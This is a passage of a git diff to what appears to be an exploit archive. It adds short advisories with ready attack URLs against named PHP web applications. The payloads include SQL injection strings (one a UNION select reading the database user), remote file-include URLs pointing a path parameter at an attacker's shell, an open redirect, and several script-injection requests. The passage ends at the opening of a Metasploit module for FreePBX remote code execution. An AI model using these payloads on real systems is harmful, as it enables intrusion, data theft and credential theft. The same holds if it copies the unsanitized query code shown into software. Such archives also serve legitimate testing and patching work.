DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1"); +.............. +Function is called on many locations and paramter is passed without santize. +In opencart\admin\controller\openbay\openbay.php +public function editLoad() { + ... + $item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']); +.............. +Where $this->request->get['product_id'] comming from GET field. +Similarly More + +public function isEbayOrder($id) { + ... + $qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1"); + +In opencart\admin\controller\extension\openbay.php + public function ajaxOrderInfo() + ... + if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){ +.............. +More +public function getProductStockLevel($productId, $sku = '') { + ... + $qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1"); +.............. +ebay.php has many more.. +User should have openbay module access +http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1' + +#Independent Pakistani Security Researcher \ No newline at end of file diff --git a/platforms/php/webapps/32521.txt b/platforms/php/webapps/32521.txt new file mode 100755 index 000000000..f3681451a --- /dev/null +++ b/platforms/php/webapps/32521.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31883/info + +Osprey is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible. + +Osprey 1.0a4.1 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell] +http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/32523.txt b/platforms/php/webapps/32523.txt new file mode 100755 index 000000000..bd2dc67f1 --- /dev/null +++ b/platforms/php/webapps/32523.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31888/info + +SiteEngine is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing-style attacks. + +SiteEngine 5.0 is vulnerable; other versions may also be affected. + +http://www.example.com/api.php?action=logout&forward=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32524.txt b/platforms/php/webapps/32524.txt new file mode 100755 index 000000000..c4730e37c --- /dev/null +++ b/platforms/php/webapps/32524.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31889/info + +SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SiteEngine 5.0 is vulnerable; other versions may also be affected. + +http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* \ No newline at end of file diff --git a/platforms/php/webapps/32525.txt b/platforms/php/webapps/32525.txt new file mode 100755 index 000000000..c8dfca3eb --- /dev/null +++ b/platforms/php/webapps/32525.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31890/info + +Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32526.txt b/platforms/php/webapps/32526.txt new file mode 100755 index 000000000..4603fb5eb --- /dev/null +++ b/platforms/php/webapps/32526.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31898/info + +ClipShare Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32527.txt b/platforms/php/webapps/32527.txt new file mode 100755 index 000000000..aba4e9975 --- /dev/null +++ b/platforms/php/webapps/32527.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31908/info + +Adam Wright HTMLTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that include HTMLTidy as a component will also be vulnerable. + +NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue. + +http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2); \ No newline at end of file diff --git a/platforms/php/webapps/32528.txt b/platforms/php/webapps/32528.txt new file mode 100755 index 000000000..29e483a8b --- /dev/null +++ b/platforms/php/webapps/32528.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31911/info + +iPei Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?pg=c0d3_xss \ No newline at end of file diff --git a/platforms/php/webapps/9623.txt b/platforms/php/webapps/9623.txt index 943d05e22..f8c733a01 100755 --- a/platforms/php/webapps/9623.txt +++ b/platforms/php/webapps/9623.txt @@ -1,39 +1,39 @@ -====================================================== - - Advanced comment system1.0 Remote File Inclusion Vulnerability - - -<> Found by : kurdish hackers team - -<> C0ntact : pshela [at] YaHoo .com - -<> Groups : Kurd-Team - -<> site : www.kurdteam.org - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - -<<->> script :: Advanced_comment_system_1-0 - -<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> Exploit :: - - >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?] - /advanced_comment_system/admin.php?ACS_path=[shell.txt?] - - -======================================================= - -======================================================= - -<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team - -# milw0rm.com [2009-09-10] +====================================================== + + Advanced comment system1.0 Remote File Inclusion Vulnerability + + +<> Found by : kurdish hackers team + +<> C0ntact : pshela [at] YaHoo .com + +<> Groups : Kurd-Team + +<> site : www.kurdteam.org + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + +<<->> script :: Advanced_comment_system_1-0 + +<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> Exploit :: + + >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?] + /advanced_comment_system/admin.php?ACS_path=[shell.txt?] + + +======================================================= + +======================================================= + +<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team + +# milw0rm.com [2009-09-10] diff --git a/platforms/unix/remote/32512.rb b/platforms/unix/remote/32512.rb new file mode 100755 index 000000000..566a514c9 --- /dev/null +++ b/platforms/unix/remote/32512.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "FreePBX config.php Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. + It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php" + parameters "function" and "args". + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'i-Hmx', # Vulnerability discovery + '0x00string', # PoC + 'xistence